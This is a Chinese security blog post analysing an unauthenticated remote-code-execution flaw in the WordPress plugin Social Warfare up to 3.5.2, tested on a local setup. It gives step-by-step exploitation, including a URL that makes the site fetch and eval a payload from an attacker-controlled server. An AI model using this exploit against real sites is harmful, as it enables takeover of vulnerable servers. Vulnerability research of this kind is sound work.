WordPress 插件 Social Warfare<=3.5.2 RCE 漏洞

热度:166℃ 评论:0 发布时间:2019-03-27 收录:未收录

3 月 21 日插件作者紧急发布了 3.5.3 版本以修复高危的 RCE 漏
洞,在<=3.5.2 版本中存在一处无需登录即可 getshell 的 RCE 漏洞。

WordPress 插件 Social Warfare<=3.5.2 RCE 漏洞

漏洞分析

在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php

文件中有一处 eval()函数,该函数将 file_get_contents() 读取的文件内容当做 PHP 代码执行,导致 RCE。

WordPress 插件 Social Warfare<=3.5.2 RCE 漏洞

漏洞利用

1、刺探是否安装了 Social Warfare 插件
访问http://127.0.0.1/wp-content/plugins/social-warfare/read
me.txt,如果存在 readme.txt 文件则说明已经安装该插件,并且从
该 txt 文件中可获知插件的版本。我的本机环境为 3.5.2 版本。

WordPress 插件 Social Warfare<=3.5.2 RCE 漏洞

2、在自己的 VPS 服务器上放置一个 code.txt 文件,并启动 HTTP 服 务器使该文件可通过 HTTP 访问。文件内容如下:
WordPress 插件 Social Warfare<=3.5.2 RCE 漏洞

3、在未登陆任何账号的情况下直接访问如下链接即可 getshell。 http://127.0.0.1//wp-admin/admin-post.php?swp_debug=load_op tions&swp_url=http://your_ip/code.txt&wpaa=phpinfo();

WordPress 插件 Social Warfare<=3.5.2 RCE 漏洞

打赏
本文由 Mr.Wu 创作,除注明转载/出处外,均为本站原创,转载前请注明出处!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

顶部
护眼
搜索
分享
公告